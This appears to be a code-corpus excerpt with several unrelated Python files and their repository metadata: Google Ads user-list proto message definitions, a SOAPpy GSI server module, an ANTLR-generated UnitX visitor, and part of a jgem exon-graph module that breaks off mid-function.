operator = proto.Field(
proto.ENUM,
number=1,
enum=user_list_number_rule_item_operator.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator,
)
value = proto.Field(proto.DOUBLE, number=3, optional=True,)
class UserListStringRuleItemInfo(proto.Message):
r"""A rule item composed of a string operation.
Attributes:
operator (google.ads.googleads.v9.enums.types.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator):
String comparison operator.
This field is required and must be populated
when creating a new string rule item.
value (str):
The right hand side of the string rule item.
For URLs or referrer URLs, the value can not
contain illegal URL chars such as newlines,
quotes, tabs, or parentheses. This field is
required and must be populated when creating a
new string rule item.
This field is a member of `oneof`_ ``_value``.
"""
operator = proto.Field(
proto.ENUM,
number=1,
enum=user_list_string_rule_item_operator.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator,
)
value = proto.Field(proto.STRING, number=3, optional=True,)
class CombinedRuleUserListInfo(proto.Message):
r"""User lists defined by combining two rules, left operand and right
operand. There are two operators: AND where left operand and right
operand have to be true; AND_NOT where left operand is true but
right operand is false.
Attributes:
left_operand (google.ads.googleads.v9.common.types.UserListRuleInfo):
Left operand of the combined rule.
This field is required and must be populated
when creating new combined rule based user list.
right_operand (google.ads.googleads.v9.common.types.UserListRuleInfo):
Right operand of the combined rule.
This field is required and must be populated
when creating new combined rule based user list.
rule_operator (google.ads.googleads.v9.enums.types.UserListCombinedRuleOperatorEnum.UserListCombinedRuleOperator):
Operator to connect the two operands.
Required for creating a combined rule user list.
"""
left_operand = proto.Field(
proto.MESSAGE, number=1, message="UserListRuleInfo",
)
right_operand = proto.Field(
proto.MESSAGE, number=2, message="UserListRuleInfo",
)
rule_operator = proto.Field(
proto.ENUM,
number=3,
enum=user_list_combined_rule_operator.UserListCombinedRuleOperatorEnum.UserListCombinedRuleOperator,
)
class DateSpecificRuleUserListInfo(proto.Message):
r"""Visitors of a page during specific dates.
Attributes:
rule (google.ads.googleads.v9.common.types.UserListRuleInfo):
Boolean rule that defines visitor of a page.
Required for creating a date specific rule user
list.
start_date (str):
Start date of users visit. If set to 2000-01-01, then the
list includes all users before end_date. The date's format
should be YYYY-MM-DD.
Required for creating a data specific rule user list.
This field is a member of `oneof`_ ``_start_date``.
end_date (str):
Last date of users visit. If set to 2037-12-30, then the
list includes all users after start_date. The date's format
should be YYYY-MM-DD.
Required for creating a data specific rule user list.
This field is a member of `oneof`_ ``_end_date``.
"""
rule = proto.Field(proto.MESSAGE, number=1, message="UserListRuleInfo",)
start_date = proto.Field(proto.STRING, number=4, optional=True,)
end_date = proto.Field(proto.STRING, number=5, optional=True,)
class ExpressionRuleUserListInfo(proto.Message):
r"""Visitors of a page. The page visit is defined by one boolean
rule expression.
Attributes:
rule (google.ads.googleads.v9.common.types.UserListRuleInfo):
Boolean rule that defines this user list. The rule consists
of a list of rule item groups and each rule item group
consists of a list of rule items. All the rule item groups
are ORed or ANDed together for evaluation based on
rule.rule_type.
Required for creating an expression rule user list.
"""
rule = proto.Field(proto.MESSAGE, number=1, message="UserListRuleInfo",)
class RuleBasedUserListInfo(proto.Message):
r"""Representation of a userlist that is generated by a rule.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
prepopulation_status (google.ads.googleads.v9.enums.types.UserListPrepopulationStatusEnum.UserListPrepopulationStatus):
The status of pre-population. The field is
default to NONE if not set which means the
previous users will not be considered. If set to
REQUESTED, past site visitors or app users who
match the list definition will be included in
the list (works on the Display Network only).
This will only add past users from within the
last 30 days, depending on the list's membership
duration and the date when the remarketing tag
is added. The status will be updated to FINISHED
once request is processed, or FAILED if the
request fails.
combined_rule_user_list (google.ads.googleads.v9.common.types.CombinedRuleUserListInfo):
User lists defined by combining two rules. There are two
operators: AND, where the left and right operands have to be
true; AND_NOT where left operand is true but right operand
is false.
This field is a member of `oneof`_ ``rule_based_user_list``.
date_specific_rule_user_list (google.ads.googleads.v9.common.types.DateSpecificRuleUserListInfo):
Visitors of a page during specific dates. The visiting
periods are defined as follows: Between start_date
(inclusive) and end_date (inclusive); Before end_date
(exclusive) with start_date = 2000-01-01; After start_date
(exclusive) with end_date = 2037-12-30.
This field is a member of `oneof`_ ``rule_based_user_list``.
expression_rule_user_list (google.ads.googleads.v9.common.types.ExpressionRuleUserListInfo):
Visitors of a page. The page visit is defined
by one boolean rule expression.
This field is a member of `oneof`_ ``rule_based_user_list``.
"""
prepopulation_status = proto.Field(
proto.ENUM,
number=1,
enum=user_list_prepopulation_status.UserListPrepopulationStatusEnum.UserListPrepopulationStatus,
)
combined_rule_user_list = proto.Field(
proto.MESSAGE,
number=2,
oneof="rule_based_user_list",
message="CombinedRuleUserListInfo",
)
date_specific_rule_user_list = proto.Field(
proto.MESSAGE,
number=3,
oneof="rule_based_user_list",
message="DateSpecificRuleUserListInfo",
)
expression_rule_user_list = proto.Field(
proto.MESSAGE,
number=4,
oneof="rule_based_user_list",
message="ExpressionRuleUserListInfo",
)
class LogicalUserListInfo(proto.Message):
r"""Represents a user list that is a custom combination of user
lists.
Attributes:
rules (Sequence[google.ads.googleads.v9.common.types.UserListLogicalRuleInfo]):
Logical list rules that define this user
list. The rules are defined as a logical
operator (ALL/ANY/NONE) and a list of user
lists. All the rules are ANDed when they are
evaluated.
Required for creating a logical user list.
"""
rules = proto.RepeatedField(
proto.MESSAGE, number=1, message="UserListLogicalRuleInfo",
)
class UserListLogicalRuleInfo(proto.Message):
r"""A user list logical rule. A rule has a logical operator
(and/or/not) and a list of user lists as operands.
Attributes:
operator (google.ads.googleads.v9.enums.types.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator):
The logical operator of the rule.
rule_operands (Sequence[google.ads.googleads.v9.common.types.LogicalUserListOperandInfo]):
The list of operands of the rule.
"""
operator = proto.Field(
proto.ENUM,
number=1,
enum=user_list_logical_rule_operator.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator,
)
rule_operands = proto.RepeatedField(
proto.MESSAGE, number=2, message="LogicalUserListOperandInfo",
)
class LogicalUserListOperandInfo(proto.Message):
r"""Operand of logical user list that consists of a user list.
Attributes:
user_list (str):
Resource name of a user list as an operand.
This field is a member of `oneof`_ ``_user_list``.
"""
user_list = proto.Field(proto.STRING, number=2, optional=True,)
class BasicUserListInfo(proto.Message):
r"""User list targeting as a collection of conversions or
remarketing actions.
Attributes:
actions (Sequence[google.ads.googleads.v9.common.types.UserListActionInfo]):
Actions associated with this user list.
"""
actions = proto.RepeatedField(
proto.MESSAGE, number=1, message="UserListActionInfo",
)
class UserListActionInfo(proto.Message):
r"""Represents an action type used for building remarketing user
lists.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
conversion_action (str):
A conversion action that's not generated from
remarketing.
This field is a member of `oneof`_ ``user_list_action``.
remarketing_action (str):
A remarketing action.
This field is a member of `oneof`_ ``user_list_action``.
"""
conversion_action = proto.Field(
proto.STRING, number=3, oneof="user_list_action",
)
remarketing_action = proto.Field(
proto.STRING, number=4, oneof="user_list_action",
)
__all__ = tuple(sorted(__protobuf__.manifest))
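# Illustrative usage sketch (not part of the generated file): proto-plus messages can be
# built with keyword arguments; the URL value and the missing operators below are
# placeholders, not a complete, API-valid rule definition.
if __name__ == "__main__":
    rule_item = UserListRuleItemInfo(
        name="url__",
        string_rule_item=UserListStringRuleItemInfo(value="example.com"),
    )
    rule = UserListRuleInfo(
        rule_item_groups=[UserListRuleItemGroupInfo(rule_items=[rule_item])]
    )
    print(rule)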
|
googleads/google-ads-python
|
google/ads/googleads/v9/common/types/user_lists.py
|
Python
|
apache-2.0
| 21,331
|
[
"VisIt"
] |
18731d9edc5a5a51af6fd2a8e36c5ade59e0798925f100b03a382c50fbf1a604
|
"""
GSIServer - Contributed by Ivan R. Judson <judson@mcs.anl.gov>
################################################################################
#
# SOAPpy - Cayce Ullman (cayce@actzero.com)
# Brian Matthews (blm@actzero.com)
# Gregory Warnes (Gregory.R.Warnes@Pfizer.com)
# Christopher Blunck (blunck@gst.com)
#
################################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
################################################################################
"""
ident = '$Id: GSIServer.py 1468 2008-05-24 01:55:33Z warnes $'
from .version import __version__
#import xml.sax
import re
import socket
import sys
import socketserver
from SOAPpy.Types import *
import http.server
# SOAPpy-py3 modules
from .Parser import parseSOAPRPC
from .Config import SOAPConfig
from .Types import faultType, voidType, simplify
from .NS import NS
from .SOAPBuilder import buildSOAP
from .Utilities import debugHeader, debugFooter
try: from M2Crypto import SSL
except: pass
#####
from .Server import *
from pyGlobus.io import GSITCPSocketServer, ThreadingGSITCPSocketServer
from pyGlobus import ioc
def GSIConfig():
config = SOAPConfig()
config.channel_mode = ioc.GLOBUS_IO_SECURE_CHANNEL_MODE_GSI_WRAP
config.delegation_mode = ioc.GLOBUS_IO_SECURE_DELEGATION_MODE_FULL_PROXY
config.tcpAttr = None
config.authMethod = "_authorize"
return config
Config = GSIConfig()
class GSISOAPServer(GSITCPSocketServer, SOAPServerBase):
def __init__(self, addr = ('localhost', 8000),
RequestHandler = SOAPRequestHandler, log = 0,
encoding = 'UTF-8', config = Config, namespace = None):
# Test the encoding, raising an exception if it's not known
if encoding is not None:
''.encode(encoding)
self.namespace = namespace
self.objmap = {}
self.funcmap = {}
self.encoding = encoding
self.config = config
self.log = log
self.allow_reuse_address= 1
GSITCPSocketServer.__init__(self, addr, RequestHandler,
self.config.channel_mode,
self.config.delegation_mode,
tcpAttr = self.config.tcpAttr)
def get_request(self):
sock, addr = GSITCPSocketServer.get_request(self)
return sock, addr
class ThreadingGSISOAPServer(ThreadingGSITCPSocketServer, SOAPServerBase):
def __init__(self, addr = ('localhost', 8000),
RequestHandler = SOAPRequestHandler, log = 0,
encoding = 'UTF-8', config = Config, namespace = None):
# Test the encoding, raising an exception if it's not known
if encoding is not None:
''.encode(encoding)
self.namespace = namespace
self.objmap = {}
self.funcmap = {}
self.encoding = encoding
self.config = config
self.log = log
self.allow_reuse_address= 1
ThreadingGSITCPSocketServer.__init__(self, addr, RequestHandler,
self.config.channel_mode,
self.config.delegation_mode,
tcpAttr = self.config.tcpAttr)
def get_request(self):
sock, addr = ThreadingGSITCPSocketServer.get_request(self)
return sock, addr
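# Illustrative usage sketch (not part of the original module): it assumes a
# Globus-enabled environment (pyGlobus) and the usual SOAPpy server API
# (registerFunction / serve_forever) provided via SOAPServerBase and the
# socketserver base classes.
if __name__ == "__main__":
    def echo(s):
        return s
    server = GSISOAPServer(('localhost', 8000))
    server.registerFunction(echo)
    server.serve_forever()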
|
cmsdaq/hltd
|
lib/SOAPpy-py3-0.52.24/src/SOAPpy/GSIServer.py
|
Python
|
lgpl-3.0
| 5,218
|
[
"Brian"
] |
5ceb737eb07b6679b49dceaa13f77a38270f430b112c9459c4b14bf3c646caec
|
# Generated from UnitX.g4 by ANTLR 4.5.1
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by UnitXParser.
class UnitXVisitor(ParseTreeVisitor):
# Visit a parse tree produced by UnitXParser#program.
def visitProgram(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#typeDeclaration.
def visitTypeDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#functionDeclaration.
def visitFunctionDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameters.
def visitFormalParameters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameterList.
def visitFormalParameterList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameter.
def visitFormalParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#block.
def visitBlock(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#blockStatement.
def visitBlockStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#repStatement.
def visitRepStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#ifStatement.
def visitIfStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expressionStatement.
def visitExpressionStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#printStatement.
def visitPrintStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#assertStatement.
def visitAssertStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#dumpStatement.
def visitDumpStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#borderStatement.
def visitBorderStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expressionList.
def visitExpressionList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#parExpression.
def visitParExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#repControl.
def visitRepControl(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#endRep.
def visitEndRep(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expression.
def visitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unit.
def visitUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unitSingleOrPairOperator.
def visitUnitSingleOrPairOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unitOperator.
def visitUnitOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#primary.
def visitPrimary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#literal.
def visitLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#string.
def visitString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#halfString.
def visitHalfString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#number.
def visitNumber(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#integer.
def visitInteger(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#boolean.
def visitBoolean(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#none.
def visitNone(self, ctx):
return self.visitChildren(ctx)
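# Illustrative usage sketch (not generated by ANTLR): the lexer/parser class names
# below are assumptions based on the grammar name (UnitX.g4); they are the usual
# ANTLR 4 companions of this visitor.
# from antlr4 import InputStream, CommonTokenStream
# from UnitXLexer import UnitXLexer
# from UnitXParser import UnitXParser
#
# stream = InputStream('print("hello")')
# tokens = CommonTokenStream(UnitXLexer(stream))
# tree = UnitXParser(tokens).program()
# UnitXVisitor().visit(tree)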
|
0ED/UnitX
|
unitx/UnitXVisitor.py
|
Python
|
mit
| 4,699
|
[
"VisIt"
] |
7bd2ec3d1c4d3d9b1faf6715a4dbe2ae177e239c407da3c0e990697004b66038
|
"""
.. module:: graph
:synopsis: Graph related stuffs
.. moduleauthor:: Ken Sugino <ken.sugino@gmail.com>
"""
# system imports
from collections import Counter
import subprocess
import multiprocessing
try:
import cPickle as pickle
except:
import pickle
import gzip
import os
import time
from functools import reduce
from itertools import repeat
from operator import iadd
import logging
logging.basicConfig(level=logging.DEBUG)
LOG = logging.getLogger(__name__)
# 3rd party imports
import pandas as PD
import numpy as N
# library imports
from jgem import utils as UT
from jgem import bedtools as BT
# Graph #######################################################################
## MEGraph version 2 (no strand: start/end based)
class MEGraph2(object):
def __init__(self, sj, me, depth=500):
if '_id' not in sj.columns:
UT.set_ids(sj)
if '_id' not in me.columns:
UT.set_ids(me)
if ('st_id' not in sj.columns) or ('st_id' not in me.columns):
UT.set_pos_info(sj,me)
self.sj = sj
self.me = me
self.depth=depth
# prepare joined table
# exon[ed_id_st,e_id_st,st_id]=>junction(st_id,_id,ed_id)=>exon[ed_id,e_id_ed,st_id_ed]
metbl = me[['ed_id','_id','st_id']]
metbl_a = metbl[metbl['ed_id']!=-1].rename(columns={'st_id':'st_id_ed','_id':'e_id_ed'})
metbl_d = metbl[metbl['st_id']!=-1].rename(columns={'ed_id':'ed_id_st','_id':'e_id_st'})
sjtbl = sj[['st_id','_id','ed_id']]
# join on donor
j1 = PD.merge(metbl_d, sjtbl, how='outer', on='st_id', sort=False)
j2 = PD.merge(j1, metbl_a, how='outer', on='ed_id', sort=False)
# remove dangling exons, junctions
idxnd = j2['e_id_ed'].notnull()&j2['e_id_st'].notnull()
if N.sum(idxnd)<len(idxnd):
j2nd = j2[idxnd].copy()
else:
j2nd = j2
# groupby exon id
j2nd['e_id_st'] = j2nd['e_id_st'].astype(int)
j2nd['e_id_ed'] = j2nd['e_id_ed'].astype(int)
self.r = j2nd.groupby('e_id_ed')['e_id_st']
self.l = j2nd.groupby('e_id_st')['e_id_ed']
self.j2 = j2
self.j2nd = j2nd
self.gr = j2.groupby('ed_id')['e_id_ed'] # groupby junction right
self.gl = j2.groupby('st_id')['e_id_st'] # groupby junction left
self.exons = me
def consistent(self):
# return consistent subset of me, sj (i.e. non-dangling)
j2 = self.j2
_stids = j2[j2['e_id_ed'].isnull()]['st_id'].values
_edids = j2[j2['e_id_st'].isnull()]['ed_id'].values
me0 = self.me[(~self.me['ed_id'].isin(_edids))|(~self.me['st_id'].isin(_stids))]
sj0 = self.sj[(~self.sj['ed_id'].isin(_edids))|(~self.sj['st_id'].isin(_stids))]
return sj0, me0
def connected(self, eid, exx=None, depth=0):
#recursive version : reaches max limit with 'PR26_@myofiber_m53_1383'
if depth>self.depth:
LOG.debug('depth {0}: eid={1}'.format(depth,eid))
if exx is None:
exx = set()
exx.add(eid)
for e in self.ex_ex(eid):
if e not in exx:
exx = self.connected(e, exx, depth+1)
return exx
def allcomponents(self): # ~45sec (sid1624)
me = self.me
#me['_visited'] = False
#mei = me.set_index('_id')
#visited = mei['_visited']
# above method of recording visited node is >x300 slower
visited = set()
genes = []
tot = len(me)
for i,eid in enumerate(me['_id'].values):
# if i % 50000 == 0:
# LOG.debug('{0}/{1}...'.format(i,tot))
#if not visited.ix[eid]:
if eid not in visited:
exx = self.connected(eid)
genes.append(exx)
#visited.loc[exx] = True
visited.update(exx)
return genes
def ex_ex(self, eid):
# return exons connected to eid
return self.ex_l_ex(eid)+self.ex_r_ex(eid)
def ex_l_ex(self, eid):
# connected through donor (down-stream)
try:
return list(self.l.get_group(eid).values)
except:
return []
def ex_r_ex(self, eid):
# connected through acceptor (up-stream)
try:
return list(self.r.get_group(eid).values)
except:
return []
def connected_nr(self, eid):
# non-recursive version; slower, and still does not terminate for PR26 (appears to loop indefinitely)
to_visit = [eid]
exx = set()
depth=0
flag = False
while(len(to_visit)>0):
depth+=1
c = to_visit.pop(0)
if depth>self.depth:
flag = True
exx.add(c)
for e in self.ex_ex(c):
if (e not in exx) and (e not in to_visit):
to_visit.append(e)
if flag:
LOG.debug('eid={1} last visit = {2}: depth {0}'.format(depth,eid,c))
return exx
def allcomponents_nr(self): # ~44sec (sid1624)
me = self.me
visited = set()
genes = []
tot = len(me)
for i,eid in enumerate(me['_id'].values):
# if i % 50000 == 0:
# LOG.debug('{0}/{1}...'.format(i,tot))
if eid not in visited:
exx = self.connected_nr(eid)
genes.append(exx)
visited.update(exx)
return genes
def sj_leftex(self,st_id,flds=['st','name']):#sjrec):
try:
left = set(self.gl.get_group(st_id).values)
tmp = self.me.ix[left]
return list(tmp[tmp['_id'].notnull()][flds].values)
except:
return []
def sj_rightex(self,ed_id,flds=['ed','name']):#sjrec):
try:
right = set(self.gr.get_group(ed_id).values)
tmp = self.me.ix[right]
return list(tmp[tmp['_id'].notnull()][flds].values)
except:
return []
def sj_ex(self,sjrec,flds=['strand']):
return self.sj_leftex(sjrec['st_id'],flds)+self.sj_rightex(sjrec['ed_id'],flds)
## MEGraph version 3 (stranded: acceptor/donor based)
class MEGraph3(object):
""" acceptor/donor version, has problem if there's unstranded data """
def __init__(self, sj, me, depth=500, maxcnt=990):
UT.set_info(sj,me)
self.sj = sj
self.me = me
self.depth=depth
self.maxcnt=maxcnt
# prepare joined table
metbl = me[['a_id','_id','d_id']]
metbl_a = metbl[metbl['a_id']!=-1].rename(columns={'d_id':'d_id_a','_id':'e_id_a'})
metbl_d = metbl[metbl['d_id']!=-1].rename(columns={'a_id':'a_id_d','_id':'e_id_d'})
sjtbl = sj[['d_id','_id','a_id']]
# join on donor
j1 = PD.merge(metbl_d, sjtbl, how='outer', on='d_id', sort=False)
j2 = PD.merge(j1, metbl_a, how='outer', on='a_id', sort=False)
# remove dangling exons, junctions
j2nd = j2[j2['e_id_a'].notnull()&j2['e_id_d'].notnull()].copy()
# groupby exon id
j2nd['e_id_d'] = j2nd['e_id_d'].astype(int)
j2nd['e_id_a'] = j2nd['e_id_a'].astype(int)
self.a = j2nd.groupby('e_id_a')['e_id_d']
self.d = j2nd.groupby('e_id_d')['e_id_a']
self.j2 = j2
self.j2nd = j2nd
self.ga = j2.groupby('a_id') # groupby acceptor
self.gd = j2.groupby('d_id') # groupby donor
self.exons = me
def consistent(self):
# return consistent subset of me, sj (i.e. non-dangling)
j2 = self.j2
_dids = j2[j2['e_id_a'].isnull()]['d_id'].values
_aids = j2[j2['e_id_d'].isnull()]['a_id'].values
me0 = self.me[(~self.me['a_id'].isin(_aids))|(~self.me['d_id'].isin(_dids))]
sj0 = self.sj[(~self.sj['a_id'].isin(_aids))|(~self.sj['d_id'].isin(_dids))]
return sj0, me0
def _connected(self, eid, depth=0):
self._cnt +=1
#recursive version : reaches max limit with 'PR26_@myofiber_m53_1383'
if (depth>self.depth):
if self._pcnt<3:
if self._pcnt==0:
LOG.debug('-'*10)
LOG.debug('{2} depth {0}: eid={1}'.format(depth,eid,self._curreid))
self._pcnt +=1
#if exx is None:
# exx = set()
self._exx.add(eid)
if self._cnt>self.maxcnt:
LOG.debug('cnt {0} > {2} aborting eid:{1}:'.format(depth,eid,self.maxcnt))
return #exx
for e in self.ex_ex(eid):
if e not in self._exx:
self._connected(e, depth+1)
return
def connected_nr(self, eid):
# non-recursive version; slower, and still does not terminate for PR26 (appears to loop indefinitely)
to_visit = [eid]
exx = set()
depth=0
flag = False
while(len(to_visit)>0):
depth+=1
c = to_visit.pop(0)
if depth>self.depth:
flag = True
exx.add(c)
for e in self.ex_ex(c):
if (e not in exx) and (e not in to_visit):
to_visit.append(e)
if flag:
LOG.debug('eid={1} last visit = {2}: depth {0}'.format(depth,eid,c))
return exx
def allcomponents(self): # ~45sec (sid1624)
me = self.me
self.visited = visited = set()
self.genes = genes = []
tot = len(me)
for i,eid in enumerate(me['_id'].values):
# if i % 5000 == 0:
# LOG.debug('{0}/{1}...'.format(i,tot))
if eid not in visited:
visited.add(eid)
self._pcnt=0
self._cnt=0
self._exx=set()
self._curreid = eid
self._connected(eid)
genes.append(self._exx)
visited.update(self._exx)
return genes
def allcomponents_nr(self): # ~44sec (sid1624)
me = self.me
self.visited =visited = set()
self.genes = genes = []
tot = len(me)
for i,eid in enumerate(me['_id'].values):
# if i % 50000 == 0:
# LOG.debug('{0}/{1}...'.format(i,tot))
if eid not in visited:
exx = self.connected_nr(eid)
genes.append(exx)
visited.update(exx)
return genes
def connected(self, eid, depth=0):
self._pcnt=0
self._cnt=0
self._exx=set()
self._curreid = eid
self._connected(eid)
return self._exx
def ex_ex(self, eid):
# return exons connected to eid
return self.ex_d_ex(eid)+self.ex_a_ex(eid)
def ex_d_ex(self, eid):
# connected through donor (down-stream)
try:
return list(self.d.get_group(eid).values)
except:
return []
def ex_a_ex(self, eid):
# connected through acceptor (up-stream)
try:
return list(self.a.get_group(eid).values)
except:
return []
def sj_leftex(self,aid,did,strand): #sjrec):
#aid,did,strand = sjrec[['a_id','d_id','strand']]
if strand=='+':
left = self.gd.get_group(did)
return self.me.ix[set(left['e_id_d'].values)]
else:
left = self.ga.get_group(aid)
return self.me.ix[set(left['e_id_a'].values)]
def sj_rightex(self,aid,did,strand): #sjrec):
#aid,did,strand = sjrec[['a_id','d_id','strand']]
if strand=='+':
right = self.ga.get_group(aid)
return self.me.ix[set(right['e_id_a'].values)]
else:
right = self.gd.get_group(did)
return self.me.ix[set(right['e_id_d'].values)]
## MEGraph version 4 (stranded, overlap of exon also counts as connection)
class MEGraph4(MEGraph3):
def __init__(self, sj, me, filepre, depth=500, maxcnt=10000):
MEGraph3.__init__(self, sj, me, depth, maxcnt)
self.pre = filepre
a = filepre+'ex1.txt.gz'
b = filepre+'ex2.txt.gz'
c = filepre+'ov.txt.gz'
# calculate exon overlap to self
cols0 = ['chr','st','ed','strand','_id']
# single cell data contains float in st,ed in ex ???
me = UT.check_int_nan(me)
a = UT.write_pandas(me[cols0], a, '')
b = UT.write_pandas(me[cols0], b, '')
c = BT.bedtoolintersect(a,b,c,wao=True)
cols1 = cols0+['b_'+x for x in cols0]+['ovl']
self.ov = ov = UT.read_pandas(c, names=cols1)
# select same strand overlap to non-self
self.ov1 = ov1 = ov[(ov['_id']!=ov['b__id'])&(ov['strand']==ov['b_strand'])]
# make connected dictionary _id => [b__id's]
tmp = ov1.groupby('_id')['b__id'].apply(lambda x: list(x)).reset_index()
if 'index' in tmp.columns:
tmp['_id'] = tmp['index']
#LOG.debug('graph.MEGraph4.__init__: tmp.columns={0}, len(tmp)={1}'.format(tmp.columns, len(tmp)))
self.eoe = dict(UT.izipcols(tmp, ['_id','b__id']))
# cleanup
os.unlink(a)
os.unlink(b)
os.unlink(c)
def ex_ex(self, eid):
# return exons connected to eid
return self.ex_d_ex(eid)+self.ex_a_ex(eid)+self.eoe.get(eid,[])
def _worker2(s,e,c):
mg = MEGraph2(s,e)
genes = mg.allcomponents()
#LOG.debug("finished {0}...".format(c))
return genes
def _worker3(s,e,c):
mg = MEGraph3(s,e)
#genes = mg.allcomponents()
genes = mg.allcomponents_nr()
#LOG.debug("finished {0}...".format(c))
#cPickle.dump(genes, open('genes-{0}.pic'.format(c),'w'))
return genes
def _worker4(s,e,c,fp):
fpc = fp+c+'.'
mg = MEGraph4(s,e,fpc)
#genes = mg.allcomponents()
genes = mg.allcomponents_nr()
#LOG.debug("finished {0}...".format(c))
#cPickle.dump(genes, open('genes-{0}.pic'.format(c),'w'))
return genes
def worker(args):
func, arg = args
return func(*arg)
def mcore_allcomponents(sj, me, np=4, version=3, depth=500, maxcnt=10000, chroms=None, filepre=''): # ~31sec (np=1)
# np number of processes
# spawn processes to process chrom-wise
# common id
if '_id' not in sj.columns:
UT.set_ids(sj)
if '_id' not in me.columns:
UT.set_ids(me)
if version==2:
if ('st_id' not in sj.columns) or ('st_id' not in me.columns):
UT.set_pos_info(sj,me)
else:
if ('a_pos' not in sj.columns) or ('a_pos' not in me.columns):
UT.set_ad_info(sj, me)
if chroms is None:
chroms = sorted(me['chr'].unique())
if version==4:
data = [(sj[sj['chr']==c], me[me['chr']==c], c, filepre) for c in chroms]
else:
data = [(sj[sj['chr']==c], me[me['chr']==c], c) for c in chroms]
data = [x for x in data if (len(x[0])>0 and len(x[1])>0)]
if np==1:
rslts = []
for d in data:
if version==3:
s,e,c = d
LOG.debug('connected component: processing {0}...'.format(c))
mg = MEGraph3(s,e,depth=depth, maxcnt=maxcnt)
elif version==4:
s,e,c,filepre = d
LOG.debug('connected component: processing {0}...'.format(c))
mg = MEGraph4(s,e,filepre,depth=depth, maxcnt=maxcnt)
else:
s,e,c = d
LOG.debug('connected component: processing {0}...'.format(c))
mg = MEGraph2(s,e,depth=depth)
tmp = mg.allcomponents_nr()
rslts.append(tmp)
LOG.debug("finished {0}...".format(c))
#cPickle.dump(tmp, open('genes-{0}.pic'.format(c),'w'))
genes = [x for y in rslts for x in y]
else:
p = multiprocessing.Pool(np)
if version==3:
